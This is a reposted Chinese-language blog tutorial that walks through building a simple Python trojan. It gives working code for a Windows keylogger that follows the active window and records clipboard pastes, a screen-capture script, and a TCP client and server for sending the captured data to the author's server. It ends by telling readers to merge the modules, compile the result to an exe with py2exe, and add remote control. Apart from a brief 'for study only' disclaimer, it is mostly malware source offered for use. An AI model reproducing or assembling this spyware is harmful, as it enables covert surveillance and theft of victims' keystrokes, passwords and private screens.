轉載自:http://www.2cto.com/kf/201501/372557.html
用於個人收藏學習。
用的版本python 2.7
0x00 準備
文章內容僅供學習研究、切勿用於非法用途!
這次我們使用Python編寫一個具有鍵盤記錄、截屏以及通信功能的簡易木馬。依然選用Sublime text2 +JEDI(python自動補全插件)來擼代碼。
首先準備好我們需要的依賴庫,python hook和pythoncom。
下載安裝python hook
下載安裝pythoncom模塊:
0x01 鍵盤記錄器
說起Keylogger,大家的思維可能早已飛向帶有wifi功能的mini小硬件去了。拋開高科技,我們暫且迴歸本質,探探簡易鍵盤記錄器的原理與實現。
Python keylogger鍵盤記錄的功能的實現主要利用了pythoncom及pythonhook,然後就是對windows API的各種調用。Python之所以用起來方便快捷,主要歸功於這些龐大的支持庫,正所謂“人生苦短,快用Python”。
代碼部分:
# -*- coding: utf-8 -*-
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
#
def get_current_process():
# 獲取最上層的窗口句柄
hwnd = user32.GetForegroundWindow()
# 獲取進程ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd,byref(pid))
# 將進程ID存入變量中
process_id = "%d" % pid.value
# 申請內存
executable = create_string_buffer("\x00"*512)
h_process = kernel32.OpenProcess(0x400 | 0x10,False,pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
# 讀取窗口標題
windows_title = create_string_buffer("\x00"*512)
length = user32.GetWindowTextA(hwnd,byref(windows_title),512)
# 打印
print
print "[ PID:%s-%s-%s]" % (process_id,executable.value,windows_title.value)
print
# 關閉handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
# 定義擊鍵監聽事件函數
def KeyStroke(event):
global current_window
# 檢測目標窗口是否轉移(換了其他窗口就監聽新的窗口)
if event.WindowName != current_window:
current_window = event.WindowName
# 函數調用
get_current_process()
# 檢測擊鍵是否常規按鍵(非組合鍵等)
if event.Ascii > 32 and event.Ascii <127:
print chr(event.Ascii),
else:
# 如果發現Ctrl+v(粘貼)事件,就把粘貼板內容記錄下來
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print "[PASTE]-%s" % (pasted_value),
else:
print "[%s]" % event.Key,
# 循環監聽下一個擊鍵事件
return True
# 創建並註冊hook管理器
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
# 註冊hook並執行
kl.HookKeyboard()
pythoncom.PumpMessages()【知識點】鉤子(Hook):Windows消息處理機制的一個平臺,應用程序可以在上面設置子程以監視指定窗口的某種消息,而且所監視的窗口可以是其他進程所創建的。
擼代碼時一定要注意嚴格區分大小寫。檢查無誤後啓動keylogger:
然後可以嘗試打開記事本寫點東西,過程中可以看到我們的keylogger窗口正在對我們的輸入實時記錄:
切換窗口時會自動跟蹤到新窗口(衆:這點功能都沒有還敢叫keylogger嗎!),light教授趁機騷擾一下瘋狗,可以看到我們的keylogger已經跟蹤到QQ聊天窗口,並忠實的記錄下我輸入的一切。
截屏實現起來更簡單,直接調用幾個gui相關的api即可,我們直接看代碼:
# -*- coding: utf-8 -*-
import win32gui
import win32ui
import win32con
import win32api
# 獲取桌面
hdesktop = win32gui.GetDesktopWindow()
# 分辨率適應
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
# 創建設備描述表
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
# 創建一個內存設備描述表
mem_dc = img_dc.CreateCompatibleDC()
# 創建位圖對象
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
# 截圖至內存設備描述表
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
# 將截圖保存到文件中
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')
# 內存釋放
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())看看效果如何:
無論是keylogger記錄下的內容,還是screenshotter截獲的圖片,只存在客戶端是沒有太大意義的,我們需要構建一個簡單server和client端來進行通信,傳輸記錄下的內容到我們的服務器上。
編寫一個簡單的TCPclient
# -*- coding: utf-8 -*-
import socket
# 目標地址IP/URL及端口
target_host = "127.0.0.1"
target_port = 9999
# 創建一個socket對象
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# 連接主機
client.connect((target_host,target_port))
# 發送數據
client.send("GET / HTTP/1.1\r\nHOST:127.0.0.1\r\n\r\n")
# 接收響應
response = client.recv(4096)
print response編寫一個簡單的TCPserver
# -*- coding: utf-8 -*-
import socket
import threading
# 監聽的IP及端口
bind_ip = "127.0.0.1"
bind_port = 9999
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip,bind_port)
def handle_client(client_socket):
request = client_socket.recv(1024)
print "[*] Received:%s" % request
client_socket.send("ok!")
client_socket.close()
while True:
client,addr = server.accept()
print "[*] Accept connection from:%s:%d" % (addr[0],addr[1])
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()開啓服務端監聽:
客戶端執行:
服務端接收到客戶端的請求並作出響應:
0x04 結語最後,你需要做的就是把上面三個模塊結合起來,一個簡易的具有鍵盤記錄、屏幕截圖並可以發送內容到我們服務端的木馬就完成了。可以使用py2exe把腳本生成exe可執行文件。當然你還可以繼續發揮,加上遠程控制功能。